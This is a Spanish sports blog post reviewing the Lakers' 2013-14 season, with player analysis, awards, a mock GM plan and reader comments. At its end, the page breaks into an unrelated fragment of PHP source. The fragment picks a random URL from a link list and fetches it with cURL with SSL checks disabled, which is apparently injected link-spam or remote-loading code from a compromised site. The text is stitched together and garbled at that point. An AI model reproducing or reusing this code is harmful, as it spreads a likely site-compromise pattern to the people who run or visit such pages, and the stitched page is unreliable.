Los Angeles Lakers: Muy deficiente

20 de June de 2014 por Viva_Dirk

Por primera vez desde que residen en Los Angeles, y hace ya 53 años, los Lakers no han llegado a las 30 victorias. En nuestro análisis previo les dábamos 10º del Oeste con casi 40 victorias pero la realidad ha dejado solo 27 victorias y noches negras para la historia de la franquicia. Con una plantilla llena de jugadores residuales  protagonizando sus mejores campañas, los momentos felices para los aficionados amarillos han sido muy pocos. El mejor de todos ellos, sin duda, la destitución de Mike D’Antoni, aunque haya tenido que pasar toda la temporada.

Solo 3 jugadores han jugado más de 70 partidos y es que en estas circunstancias cualquier molestia era suficiente para borrarse. El no-regreso de Kobe Bryant y la ausencia de Steve Nash fue la excusa perfecta para que muchos se tomaran licencia absoluta para tirar, lucirse y mirar más por sus carrera individuales que por el equipo. La mayoría no la verán más gorda en su vida para hacer números porque realmente productivos no han sido.

El máximo anotador del equipo ha sido Nick Young. El talentoso escolta de 29 años se ha ido hasta los 18 puntos por noche con buenos porcentajes de 3 puntos pero su aportación en cualquier otra faceta del juego ha sido nula. Otro que aun no debe creerse la temporada que ha protagonizado es Jodie Meeks. Sus 15.7 puntos no son algo fácil de conseguir para un tirador tan unidimensional como él. Kent Bazemore también aprovechó la carta blanca durante sus 23 partidos de amarillo e incluso llegó a provocar declaraciones de algún compañero sobre la cantidad de tiros que estaba asumiendo. El último de la lista sería Kendall Marshall que pasó de jugar en la D-League a disfrutar de 29 minutos por partido en los que dejó muestras de sus excelente capacidades como organizador de juego, al mismo tiempo que de su escasa capacidad atlética y sus problemas con el lanzamiento de larga distancia. Difícilmente volverán a disfrutar de los enormes privilegios que han tenido este año en cualquier otra plantilla de la NBA pero Young, Meeks y Marshall es posible que pudieran resultar útiles dentro de un equipo competitivo con los roles adecuados. 
En el otro lado de la moneda hemos de situar a jugadores que aunque han aprovechado el momento para lucir no han dejado de lado sus obligaciones colectivas. Pau Gasol ha protagonizado una temporada estadísticamente muy buena. 17.4 puntos, 9.7 rebotes, 3.4 asistencias y 1.5 tapones con un 48% TC no está nada mal para un jugador de casi 34 años cuyo físico no ha sido nunca privilegiado. Sin embargo,  tanto sus desencuentros con D’Antoni como los continuos rumores que le incluían en múltiples traspasos han hecho de esta temporada una de las más duras (sino la más) de su carrera. Jordan Hill es el jugador número 13 en minutos por partido de todos los que han pasado por los Lakers este año pero en los 20 minutos por partido que ha jugador ha promediado 9.7 puntos y 7.4 rebotes y ha demostrado que es una pieza de buen nivel para la rotación de cualquier juego interior. Wesley Johnson y Xavier Henry han dejado también muestras de sus capacidades. Ambos han dejado claro que pueden y quieren defender a la vez que en ataque no se han dedicado a lanzar de forma indiscriminada.

La franquicia se planta en este verano con todo por hacer cerrar la peor temporada de la historia de la franquicia en 50 años. Lo único seguro es que Kobe Bryant va a jugar 2 años más de amarillo y eso es ‘per se’ una buena noticia para cualquier aficionado de los Lakers.

PREMIOS

MVP: Pau Gasol ha completado una gran temporada en términos estadísticos (dentro del top15 tanto en rebotes como en tapones) y a la vez ha demostrado (para bien y para mal) que por encima de todo es un jugador de equipo.

Rookie: Ryan Kelly ha disfrutado de muchos más tiempo de juego de lo que esperaba. En 22 minutos de juego nos ha presentado su buena muñeca y ha promediado 8 puntos. Sin embargo, dificilmente encontrará un hueco en la liga mas allá de un papel testimonial.

Sorpresa: La mayor sorpresa es que Mike D’Antoni haya dirigido al equipo durante todo el curso aunque entendemos las razones económicas que puede haber detrás de esta decisión. Tampoco podemos menospreciar en el contexto que sea los 18 puntos por partido de Nick Young en 28 minutos de juego. Eso son 23 en 36 minutos.

Decepción: La plaga de lesiones que ha sufrido el equipo en sus hombres más consagrados en digna de estudio. Si sumamos los partidos que se han perdido Kobe, Nash, Kaman y Pau nos da la friolera de 208 partidos. También esperaba más de la llegada de MarShon Brooks al equipo. Algo raro debe pasar con este chaval.

Mayor esfuerzo en vano: De largo Jordan Hill cuyo esfuerzo no sólo ha sido en vano a la hora de ganar partidos sinó también para ganar más minutos en pista por parte de un entrenador que ha puesto por delante suyo a jugadores como Bazemore o Kelly.

JUGANDO A GM

El primer punto a analizar es la elección en el pick 7 del draft. En los últimos días los problemas físicos de Julius Randle han aflorado y parece que será el jugador que llegará a la elección de Lakers en lugar de Noah Vonleh o Dante Exum. Según son los problemas físicos de los que se habla escogería a Randle con los ojos cerrados antes que a los otros 2, el ala-pivot tendrá muy dificil llegar a ser una superestrella, pero su suelo es realmente alto y sus ganas de comerse el mundo saltan a la vista. En caso de no llegar Randle y hacerlo Vonleh lo dejaría pasar y elegiria a Dario Saric, que además ha dado muestras de querer jugar en Lakers o Celtics, y siendo elegido por estos es posible que jugase directamente la siguiente temporada en la NBA. Mas allá de saber si llegaría el siguiente año, Saric es un perfil de jugador por el que merece la pena arriesgar. Con esto, contamos con Julius Randle como elección mas probable.

En cuanto al mercado de agentes libres y posibles traspasos el primer punto que deben arreglar los Lakers es la situación de Pau Gasol, si el español quiere ir a un equipo que pelee por el título deberá firmar un s&t, si no recalará en un equipo del nivel de Lakers o peor. Para el s&t suenan equipos como Thunders, Bulls o Warriors; de estos me decantaría de largo por los Thunders, donde jugadores como Reggie Jackson y Jeremy Lamb deberían ser el objetivo a conseguir, en especial el base; digamos algo como Reggie Jackson+Perkins+pick21. Con dicho pick los Lakers podrían elegir al escolta de UCLA Jordan Adams, para darle descanso a Kobe.

Con este movimiento los Lakers dispondría de 18 millones para gastar aproximadamente. Los mejores agentes libres disponibles ya son Kyle Kowry, Luol Deng y Marcin Gortat, a la espera de que los grandes nombres decidan que hacer con sus player options. De los nombrados, me decantaría por Gortat y además iría a por un compañero suyo y viejo conocido como Trevor Ariza, con un contrato 11 millones para el center y uno de 7 para el alero. Luego con la mid level deberían buscar un refuerzo interior, entre DeJuan Blair y Jason Smith el que mas barato salga.

En lo que respecta a renovaciones, jugadores como Jordan Hill, Wes Johnson, Jodie Meeks y Xavier Henry podría continuar en la franquicia, siempre y cuando no supongan un impedimento para la llegada de piezas importantes, en cuyo caso puerta a todos sin miramientos. Salvo Jordan Hill, dudo que alguno de los otros aspire a más que un contrato de 2 millones. Nick Young aspirará a un contrato mayor del que Lakers debe firmarle para que sea viable.

Acabo diciendo que si cualquiera de las grandes estrellas muestra interés en ir a Lakers acabará en Lakers, ha sido una política constante en la historia de la franquicia. Pero no contaremos con ello a la hora de confeccionar la plantilla.

Con esto nos queda:

PG: Reggie Jackson y Steve Nash (Kendall Marshall)
SG: Kobe Bryant y Jordan Adams (Jodie Meeks)
SF: Trevor Ariza y Xavier Henry (Wes Johnson)
PF: Julius Randle y Jordan Hill (Wes Johnson)
Pivots: Marcin Gortat y Jason Smith/DeJuan Blair (Robert Sacre)

Comenta

9 comentarios a esta entrada

  1. Denise dice:
    #1

    Reggie Jackson+Perkins+pick21 por Gasol???? Qué clase de droga debe tomar el GM de Lakers?
    No tiene sentido bajo mi punto de vista, hacerle un nuevo contrato a Pau, para traspasarlo a cambio de Jackson (gran jugador si), pero para también comerte los 9 kilos del tronco de Perkins. Para eso, le pago 9 kilos directamente a Eric Bledsoe, que es mejor que Reggie Jackson y no tengo que comerme un año a la bazofia de Kendrick Perkins.

      Citar

  2. Viva_Dirk dice:
    #2

    Si claro, y los Suns no igualarían una oferta de 9 millones. Perkins es obligatorio en ese trade para cuadrar.

    Pau como mucho vale eso, a los hechos me remito.

      Citar

  3. Esteban dice:
    #3

    explicamelo mejor, Randle, Vonleh y Exum dices que estarian disponibles en la posicion 7 para que los lakers eligan a uno de ellos?

    En todo caso dudo que los lakers puedan escoger, esos 3 y Smart seran seleccionados del puesto 3 al 6 y el que le quede libre tomara los Lakers, una pena pero no hay decision aqui

    luego de los 7 primeros puestos no hay un potencial similar, Gorgon o LeVine si los lakers quieren arriesgarse

    sin quieren un jugar de rol seguro y que puede convertirse en una segunda espada grande enserio podrian ir por Saric, el hecho de que lo tomen 7mo y los Lakers lo llevarian a la NBA este año que es lo que tanto temen todos

      Citar

  4. Esteban dice:
    #4

    Denise:
    Reggie Jackson+Perkins+pick21 por Gasol????Qué clase de droga debe tomar el GM de Lakers?
    No tiene sentido bajo mi punto de vista, hacerle un nuevo contrato a Pau, para traspasarlo a cambio de Jackson (gran jugador si), pero para también comerte los 9 kilos del tronco de Perkins. Para eso, le pago 9 kilos directamente a Eric Bledsoe, que es mejor que Reggie Jackson y no tengo que comerme un año a la bazofia de Kendrick Perkins.

    no compaorto Denise, 9 kilos para Bledsoe en sus sueños, ese chaval va a cobrar mucho mas

    conseguir a Jackson por gasol noe sta tan mal, y los 9 kilos de Perkis por un año no es tan malo, cualquier centro que hay sido titular el año pasado en la NBA pedira una suma parecida, sino que lo digan los Mavs con Dalembert

      Citar

  5. Esteban dice:
    #5

    JUEGO AL GM

    Con tanto espacio, los lakers podrian ofrecerle a Boozer si es amnistiado y entra a la puja, 4 o 5 millones por el año que le queda y creo que ganarian la subasta, se llevarian a un buen 4 por poco dinero

    eso los liberaria de renovar a gasol por muchos millones y a un alto precio

    otro jugador que por 5 o 7 millones podia ir seria Okafor, apostando a que se recupere de su lesion, puede ser un alternativa

    con Kobe y ese juego interior “barato”, mas Smart en la base, habria suficiente dinero y equipo para convencer a Anthony o aunque mucho mas dificil a James

    lsuplentes que quieran jugar en los lakers, con kabe y James por poca plata, van a sobrar

      Citar

  6. Ruxixon dice:
    #6

    Hay un rumor,en mi opinión lejos de ser cierto,por el cual Philadelphia traspasaría a MCW + Young por Nash y el pick 7,supongo que Lakers tendría que dar un pick futuro porque si no sería un timo.Ese traspaso,de ser Kuchpak o como se escriba,lo aceptaba ipso facto,Carter Williams – Kobe – T.Young,más lo que puedan pescar en la FA les saca de pobres,no sé si para llegar a PO,pero es lo que hay cuando Kobe firma por más de 20 millones.Si firman a Deng y un pívot por ahí aseadete,ya tienen quinteto titular.

      Citar

  7. Denise dice:
    #7

    Ruxixon:
    Hay un rumor,en mi opinión lejos de ser cierto,por el cual Philadelphia traspasaría a MCW + Young por Nash y el pick 7,supongo que Lakers tendría que dar un pick futuro porque si no sería un timo.Ese traspaso,de ser Kuchpak o como se escriba,lo aceptaba ipso facto,Carter Williams – Kobe – T.Young,más lo que puedan pescar en la FA les saca de pobres,no sé si para llegar a PO,pero es lo que hay cuando Kobe firma por más de 20 millones.Si firman a Deng y un pívot por ahí aseadete,ya tienen quinteto titular.

    No sé si es cierto ó no, lo que si es cierto es que Carter-Williams suena en un montonazo de rumores lo que se da a entender que los 76ers sospechan que sus numeros del año pasado están muuuuy inflados y antes de que su valor pueda depreciarse este año con más competencia en su equipo y menos tiros para tirarse, lo querrán empaquetar a algún lado y traerse a cambio algo de alto valor. Más aun cuando con el pick 3 pueden pillar a un PG como Smart (ó Exum si lo contamos como PG)

      Citar

  8. Esteban dice:
    #8

    disculpenme pero prefiero jugarme con Smart que con MCW

    no me gusta nada nada Williams, sus numero no solo estan inflados, sino que su juego fue muy ayudado por un sistema de “hacer lo que se quiera” que le ayudo a maquillar sus deficits de conducción

    no digo que no sirva para nada, pero esta lejos de ser un jugador de esos números, por el contrario, dudo que pueda mantenerlos en el futuro

      Citar

  9. Ruxixon dice:
    #9

    Parece cantado que sus números como rookie serán difíciles de superar,pero aún así creo que sería buen fit con Kobe.Evidentemente pensando en el futuro de la franquicia prefiero a Smart por encima suyo,pero quizás no encaje tan bien con el ego de Kobe,veo a Carter Williams más dócil en ese sentido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>